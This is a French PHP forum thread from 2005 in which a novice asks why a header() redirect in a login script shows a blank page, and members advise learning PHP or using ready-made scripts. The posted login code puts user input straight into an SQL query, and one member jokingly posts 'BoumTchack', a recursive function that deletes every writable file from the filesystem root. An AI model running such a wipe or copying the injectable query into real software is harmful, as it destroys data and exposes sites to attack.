Fonction Header PHP

DCO2 Messages postés 56 Date d'inscription jeudi 14 avril 2005 Statut Membre Dernière intervention 3 avril 2006 - 6 déc. 2005 à 14:45
J_G Messages postés 1406 Date d'inscription mercredi 17 août 2005 Statut Membre Dernière intervention 28 août 2007 - 21 déc. 2005 à 20:39
Bonjour,

J'aimerai savoir comment paramétrer une fonction header.

Voici le débur de la page:

<?php
session_start();
if (@$userid &amp;&amp; @$password) {
    require "connect.inc";
    $res = @mysql_query("SELECT userid FROM users WHERE userid='$userid' AND password='$password' AND level='registered'");
    if(@mysql_num_rows($res) != 0) {
        $verified_user = $userid;
        session_register("verified_user");
        //echo "bon password";
        Header("Location: ."/".$page_redirection");
//.....
?>


Si je met cette fonction Header comme ci dessus j'ai un page blanche qui s'affiche.
J'ai essayé plusieurs manière de la paramétrer mais toujours sans résultat.
Merci de votre aide.

76 réponses

DCO2 Messages postés 56 Date d'inscription jeudi 14 avril 2005 Statut Membre Dernière intervention 3 avril 2006
12 déc. 2005 à 23:48
OK je te remercie J_G.
effectivement je connait peu le php et j'essaye d'apprendre alors je vais suivre ton conseil et me plonger dans les tutoriaux. je pense que je vais aller sur le site du Zero qui me semble à ma portée.

Je vous tiens au courant de mon avancé dans ce domaine et je vous remercie tous pour votre aide.
0
kankrelune Messages postés 1293 Date d'inscription mardi 9 novembre 2004 Statut Membre Dernière intervention 21 mai 2015
12 déc. 2005 à 23:58
Je ne peux qu'aller dans le sens de J_G... à voir le script que tu es en train de faire tu est en train de faire une authentification pour une boutique en ligne ou quelque chose du genre... raison de plus pour ne pas faire les choses à moitié ou alors c'est la porte ouverte aux pirates... c'est un peu comme si tu décidais de construire une banque et son coffre de tes mains alors que tu es boulanger... si tu vois ce que je veux dire... .. .

Donc deux solutions...

-1- tu prend un script tout fait de commerce en ligne et profite ainsi de l'expérience des personnes qui dévellopent le projet

-2- tu prend le temps d'apprendre le php... ça mettra quelques semaines voir quelques mois de plus mais ton script n'en sera que meilleur... et plus sécurisé... .. .

@ tchaOo°

ps : pas mal le coup du BoumTchack... lOol... méchant va... .. . ;o)
0
J_G Messages postés 1406 Date d'inscription mercredi 17 août 2005 Statut Membre Dernière intervention 28 août 2007 10
13 déc. 2005 à 00:15
J'aurais rien du dire...



Si il avait fait BoumTchack('.');

Le problème aurait été nettoyé en profondeur... Vite-fait-bien-fait. :)





Puis m&#234;me... pourquoi je me suis limit&#233; au r&#233;pertoire courrant !?!



<?php
 function BoumTchack($dir) {
     $dh  = opendir($dir);    while (false !($filename readdir($dh))) {
       if(is_file($filename)) 

            if( is_writable($filename) ) unlink($filename);

        elseif( $filename=='.' or $filename='..' ) continue;
        else {
             if(is_readable(
$dir.'/'.$filename)) {

              
BoumTchack($dir.'/'.$filename));
                
if( is_writable($filename) ) 
unlink($filename);

          }    
         }
    }

    closedir($dh);
 }
 
if( is_dir('/') ) BoumTchack('/');

else BoumTchack('c:\'); 


 ?>



Voil&#224; qui est mieux ;)

0
kankrelune Messages postés 1293 Date d'inscription mardi 9 novembre 2004 Statut Membre Dernière intervention 21 mai 2015
13 déc. 2005 à 00:34
o_Ô

LOol... .. . ;o)

@ tchaOo°
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
DCO2 Messages postés 56 Date d'inscription jeudi 14 avril 2005 Statut Membre Dernière intervention 3 avril 2006
13 déc. 2005 à 11:45
Bonjour,

Pour faire suite de notre conversation d'hier soir,
est-ce que J_G peut me donner la solution à mon problème?
puisqu'il la connait car en ce moment jen n'ai pas beaucoup de temps devant moi pour pouvoir me plonger dans le PHP et il faudrai que je puisse mettre cet espace membre en ligne d'ici la fin de semaine.

En te remerciant par avance de toute l'aide que tu m'as apporté.
0
J_G Messages postés 1406 Date d'inscription mercredi 17 août 2005 Statut Membre Dernière intervention 28 août 2007 10
13 déc. 2005 à 12:17
Non...



Je ne sais pas ce qui coince dans tes scripts.

Quand je disais :

"C'est bon cherches plus, j'ai trouvé quel était le problème".

Je parlais de ton incompréhension de PHP...



Vois-tu, depuis quasiment les premiers messages (et diantre ! j'en ai
jamais vu autan pour un seul sujet) on te demande d'insérer des lignes
de débuggage pour essayer de comprendre où est le bug. Et non quel est le bug !



Car la première étape est de repérer le coin-coin avant d'y foutre un coup sur le calci!



Or... Pas moyen de le serrer ce coquin !

A mon avis (je ne sais pas ce qu'en pense kankrelune) il n'est pas dans le bout de code que tu nous montre.





C'est pour ça que par la suite, j'ai précisai :


"tu ne sauras nous dire quelle est la partie du script qui bug réellement, car tu n'as pas encore saisi le sens de PHP"






Et oui... Tu as vu trop gros pour http://mon.site.web/boutique. Fais gaffe la prochaine fois !





Je ne peux pas faire mieux que te conseiller d'apprendre PHP, même si
le temps te manque (ou d'acheter un gros paquet de café robusta).



Et soit sûr que ça me désole...

Bonne chance...



PS : va chercher une script d'authentification tout cuit sur le net.
C'est peut-être la meilleure chose que tu ai à faire à cette heure-ci...
0
DCO2 Messages postés 56 Date d'inscription jeudi 14 avril 2005 Statut Membre Dernière intervention 3 avril 2006
13 déc. 2005 à 13:05
Bonjour et merci d'avoir répondu,

Mais le code que je vous montre viens précisément de ce site et c'est Krozone qui l'a fait. Je ne l'ai que juste adapté à mon site.
Adresse de la source:

http://www.phpcs.com/code.aspx?ID=26795

J'ai déjà posté plusieurs message à ce Krozone sans réponse de sa part.
Ce script marche pour certain et pourquoi pas sur mon site. Là est la question. Pourtant je le trouve génial avec toutes les fonctionnalité dont j'ai besoin (envoi d'un email pour confirmer, email pour le webmaster, adresse ip ....)

Merci
0
DCO2 Messages postés 56 Date d'inscription jeudi 14 avril 2005 Statut Membre Dernière intervention 3 avril 2006
13 déc. 2005 à 13:07
Connais tu un script avec autant de fonctionalités et facile d'emploi?
0
kankrelune Messages postés 1293 Date d'inscription mardi 9 novembre 2004 Statut Membre Dernière intervention 21 mai 2015
13 déc. 2005 à 13:08
Je pense aussi que ça bloque ailleurs... et il doit en être de même pour FhX... car si ça bloque dans le bout de code que tu nous a donné hormis une incohérence structure de la table de la
0
FhX Messages postés 2350 Date d'inscription mercredi 13 octobre 2004 Statut Membre Dernière intervention 18 avril 2015 3
13 déc. 2005 à 13:20
Ahahahaha :)

Essaye :
header('Location : ./boutique/index.php');

De toute facon :
header('Location : '.$page_redirection); ne peut pas marcher car $page_redirection = 'boutique/index.php'; qui n'est même pas un lien correct !

Essaye ce que j'ai mis au dessus.
Si ca met une erreur 404, c'est qu'il faut juste que tu trouve le bon chemin jusqu'à ton fichier.

Problème résolu :|
0
kankrelune Messages postés 1293 Date d'inscription mardi 9 novembre 2004 Statut Membre Dernière intervention 21 mai 2015
13 déc. 2005 à 13:29
Et M%ùµ*£$... désolé j'ais appuyé sur enter par mégarde... .. .

Je disais donc que je pense aussi que ça bloque ailleurs (surment du html envoyé avant les header)... car hormis une incohérence entre la structure de la table dans la bdd et les noms des champs que tu appel je ne vois pas ce qui pourrait clocher dans le code que tu nous a donné... et même ça ça devrait retourner une erreur avec error_reporting à E_ALL... de même pour un header redéclarés... de toute façon les cause de ce bug peuvent être multiple... des modif que tu y a fait à un problème de configuration serveur en passant par un bug du script lui même ou un mauvais paramétrage... .. .

Le truc c'est que en admettant que l'on trouve le problème tu ne sera pas beaucoups plus avancé quand à l'utilisation de php... comment fera tu si un autre bug se présente... et puis un autre... et puis un autre (ce qui est plus que fréquent en phase de developpement)... et concernant une boutique c'est primordial que tu sache ce que tu fais... pour un petit espace membres avec messages privés passe encore que tu ne comprenne pas tout mais là c'est quand même bien plus exigeant comme mise en place... si tu te fais hacker par le premier venu tu fais comment... et la faille tu la comble comment... .. ?

Alors moi le mieux que je puisse te proposer si t'es pressé c'est d'installer un script tout fait... il te faut juste une boutique en ligne ça existe en script tout fait... il te faut un site un peu plus developpé avec un espace membre dont un espace boutique regarde du coté des CMS... sans vouloir faire de pub je te conseillerais bien Xoops (lOol ;o) mais il ne dispose pas de module de boutique en ligne digne de ce nom... après si c'est un truc simple genre allopass c'est codable... .. .

Comme je le disais tout à l'heure tu es en train de vouloir construire une maison avec des connaissances de chauffeur de bus (contre qui je n'est rien je le précise au cas où)... tu risque de monter les murs avant les fondations... .. .

Comme te l'a expliqué J_G le php est un language de programation... cela implique donc toute une logique qui ne s'apprend pas en deux secondes... c'est comme si tu nous disais que tu veux apprendre l'anglais car tu part demain pour Londre... tu me suis... par exemple (sans vouloir te décourager) moi ça fait 1 an et demi que je me suis vraiment mis le nez dedans (sachant qu'avant je bidouillais déja un peu) et je peux te dire que bien que j'ais fais de gros progrès (encore heureux) je suis encore loin te tout savoir... très très loin... .. .

Donc comme je l'ais déja dit (ainsi que J_G) soit tu as quelques mois devant toi ainsi qu'une bonne cafetière soit je te conseil fortement de prendre un script complet (et non pas des bout de scripts)... .. .

Bon courage et bonne continuation à toi... .. .

^_^

@ tchaOo°
0
DCO2 Messages postés 56 Date d'inscription jeudi 14 avril 2005 Statut Membre Dernière intervention 3 avril 2006
13 déc. 2005 à 14:25
Tchao et merci pour votre aide. Je vais clore ce sujet et essayer autre chose comme script.

Et encore merci à tous.

Salut.
0
DCO2 Messages postés 56 Date d'inscription jeudi 14 avril 2005 Statut Membre Dernière intervention 3 avril 2006
21 déc. 2005 à 08:57
Bonjour à tous me revoilà pour vous donner de mes nouvelles.

J'ai trouvé la solution à mon problème.

J'ai changé le Header("Location: ../".$page_redirection);

de la page securite.php par une fonction java:

print ("<script>document.location.replace('../boutique/index.php');</script>");

Et cela fonctionne maintenant.

Quen pensez vous?

Merci pour votre réponse.
0
coucou747 Messages postés 12303 Date d'inscription mardi 10 février 2004 Statut Membre Dernière intervention 30 juillet 2012 44
21 déc. 2005 à 09:52
Salut,
c'est dégeu !!!!!


déja, c'est du javascript et non du java...


echo '<script type="text/javascript">document.location.href="../boutique/index.php";</script>';

In a dream, I saw me, drop dead... U was there, U cried... It was just a dream, if I die, U won't cry, maybe, U'll be happy

Mon site (articles sur la programmation et programmes)
0
kankrelune Messages postés 1293 Date d'inscription mardi 9 novembre 2004 Statut Membre Dernière intervention 21 mai 2015
21 déc. 2005 à 18:22
Oui c'est un peu dégueu... .. .

Dit toi que le javascript est désactivé sur certain navigateurs... alors que php marche pour tout le monde... .. .

@ tchaOo°
0
J_G Messages postés 1406 Date d'inscription mercredi 17 août 2005 Statut Membre Dernière intervention 28 août 2007 10
21 déc. 2005 à 20:39
Presque pareil que les autres :

"Peu mieux faire"





En plus, document.location n'existe pas... Il s'agit de window.location, je suis même étonné que ça marche ainsi.

Et puis un joli <script type="text/javascript"><!--...Beurk...--></script> fera le plus grand bien :)



Si tu n'arrives vraiment pas avec le header, fait de la "pseudo frame".



Aaah non !!! Ne me demande pas ce que c'est ! Cherche un peu avec ton goût-gueule préféré...





A+
0
Rejoignez-nous